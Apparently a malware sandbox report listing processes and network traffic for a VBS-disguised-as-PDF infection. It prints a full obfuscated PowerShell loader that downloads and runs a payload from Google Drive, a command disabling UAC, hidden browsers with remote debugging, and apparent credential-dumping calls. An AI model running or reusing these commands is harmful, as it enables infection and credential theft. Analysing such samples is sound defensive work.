PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1156 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1908 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 1908 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 4668 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 4668 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 4668 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4468 wrote to memory of 4668 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef742cc40,0x7ffef742cc4c,0x7ffef742cc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ipkbcbdtqcanblnqdgg"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\skpudloveksadsjumqtiyl"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\devedeyosslfogxydbokjqfvl"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1984,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2128,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2528 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4468 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4848,i,3543699451356355492,14582566705228512650,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffef79b46f8,0x7ffef79b4708,0x7ffef79b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2168,7148396590519616296,167010257040278562,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1404 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
